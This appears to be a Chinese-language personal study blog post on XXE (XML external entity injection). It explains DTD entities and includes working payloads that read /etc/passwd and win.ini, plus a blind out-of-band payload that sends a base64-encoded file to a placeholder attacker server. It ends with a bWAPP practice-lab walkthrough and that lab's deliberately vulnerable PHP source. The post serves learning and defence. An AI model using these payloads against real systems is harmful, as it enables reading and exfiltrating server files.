XXE学习
title: XXE学习
date: 2019-03-22 20:51:41
tags:
- XXE
categories:
- Web安全
- XXE
前言
本来是想了解一下SSRF的,结果找到讲bWapp的SSRF的博客,里面有一个关于XXE的SSRF,索性就先把XXE看一下。
参考链接:
XXE和XML、DTD
先分别说一下这三个词的概念吧
XXE
XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,是对非安全的外部实体数据进行处理时引发的安全问题。要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。
DTD
DTD全称Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据类型有限,无法对元素或属性的内容进行详细规范,在可读性和可扩展性方面也比不上XML Schema。
XML
XML 指可扩展标记语言,被设计用来传输和存储数据。
学习链接
关于XML跟DTD的语法规则,我也是才看,还是不多说了,直接给教程链接吧。其中DTD的实体声明重点看
XML教程
DTD教程
基本Payload结构
<?xml version="1.0" encoding="UTF-8"?> //xml声明
<!DOCTYPE miracle [ //DTD部分
<!ELEMENT miracle ANY > //元素类型声明
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]> //实体声明里的外部实体声明
<miracle>&xee;</miracle> //XML部分
DTD实体声明
上述Payload分析
稍微对linux有点了解的,看到上面的Payload结构中的DTD部分外部实体声明即<!ENTITY xxe SYSTEM "file:///etc/passwd">这一句就应该猜到这个Payload的作用了吧。
没错,这个Payload的作用是输出目标服务器(服务器若为Linux)的passwd文件。
那如果想用XXE漏洞进行一些别的操作,如:内网探测、内网入侵该怎么办呢?
那就要讲到DTD实体声明了。
实体声明又分为内部实体声明、外部实体声明、参数实体声明等。这里就只讲外部实体声明、参数实体声明吧
DTD外部实体声明
DTD外部实体声明语法:<!ENTITY 实体名称 SYSTEM "URI/URL">
引用方式: &实体名
外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下图所示:
image
示例:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>
DTD参数实体声明
语法:<!ENTITY % 实体名称 "实体的值"> 或 <!ENTITY % 实体名称 SYSTEM "URI">
引用方式:%实体名
示例:
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>
外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
XXE的利用方式-DTD
XXE作用
利用xxe漏洞可以进行拒绝服务攻击,文件读取,命令(代码)执行,SQL(XSS)注入,内外扫描端口,入侵内网站点等,内网探测和入侵是利用xxe中支持的协议http等进行内网主机和端口发现,可以理解是使用xxe进行SSRF的利用,基本上啥都能做了
XXE分类
一般xxe利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据。
有回显情况
有回显的情况可以使用如下的两种方式进行XXE注入攻击,也就是上面讲到的DTD外部实体声明和参数实体声明。
方式一:
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>
方式二:
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>
外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >
无回显情况
可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。
<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php">
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xxx/evil.dtd">
%dtd;
%send;
]>
evil.dtd的内容,内部的%号要进行实体编码成%。
注意此处的参数实体声明语法格式是:<!ENTITY % 实体名称 "值">
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://xxx.xxx.xxx/?data=%file;'>"
>
%all;
这里执行完查看结果分两种情况:
- 有报错
有报错信息的话,直接查看错误信息有没有目标文件源码的base64 - 没有报错
没有报错的话,查看被发送机(自己的主机且具有公网IP)的访问日志。
还有bWapp中的xxe利用,待更···
2019/03/27 更
bWapp里的XXE实验
0x01 进入bWapp,选择XXE漏洞环境
- 打开bWapp虚拟机,未安装参考BWAPP:一款非常好用的漏洞演示平台进行安装
- 使用账户:
bee密码:bug进行登录,并选择安全级别为low -
登录后选择XXE漏洞环境,点击hack
image
-
成功进入到XXE漏洞环境
image
0x02 抓包分析
-
打开Burp,设置好浏览器代理,点击Any bugs?,查看抓包结果
image
- 对抓包结果分析,如上图所划线处,可以看到xxe-1.php页面以POST方式向xxe-2.php提交xml数据
0x03 构造payloads
payload:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE miracle [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<reset>
<login>&xxe;</login>
<secret>Any Bugs?</secret>
</reset>
0x04 使用Burp repeater提交payloads
image
0x05 源码分析
- 先放源码:
<?php
include("security.php");
include("security_level_check.php");
include("connect_i.php");
$message = "";
$body = file_get_contents("php://input");
// If the security level is not MEDIUM or HIGH
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
{
ini_set("display_errors",1);
$xml = simplexml_load_string($body);
// Debugging
// print_r($xml);
$login = $xml->login;
$secret = $xml->secret;
if($login && $login != "" && $secret)
{
// $login = mysqli_real_escape_string($link, $login);
// $secret = mysqli_real_escape_string($link, $secret);
$sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";
// Debugging
// echo $sql;
$recordset = $link->query($sql);
if(!$recordset)
{
die("Connect Error: " . $link->error);
}
$message = $login . "'s secret has been reset!";
}
else
{
$message = "An error occured!";
}
}
// If the security level is MEDIUM or HIGH
else
{
// Disables XML external entities. Doesn't work with older PHP versions!
// libxml_disable_entity_loader(true);
$xml = simplexml_load_string($body);
// Debugging
// print_r($xml);
$login = $_SESSION["login"];
$secret = $xml->secret;
if($secret)
{
$secret = mysqli_real_escape_string($link, $secret);
$sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";
// Debugging
// echo $sql;
$recordset = $link->query($sql);
if(!$recordset)
{
die("Connect Error: " . $link->error);
}
$message = $login . "'s secret has been reset!";
}
else
{
$message = "An error occured!";
}
}
echo $message;
$link->close();
?>
- 如下图,若安全级别为low的话,就从xml传输的数据中取出值来赋给login
image
-
login再拼接成message
image
-
message直接输出,所以存在XXE漏洞,利用login进行我们想要的操作并回显
image
-
在源码中也能看到,对于中高级别,login从Session中获取,secret从xml获取后也用 mysqli_real_escape_string函数进行了特殊字符转义。
总结
<p style="text-indent:27px">本来还想写一下jarvis oj上一个xxe的例子,后面想想还是留到后面写刷jarvis题目的时候在写吧。XXE就学到这里吧(更深的现在也找不到例子学不来,2333,以后再深入吧),过几天把SSRF简单学习总结一下。</p>
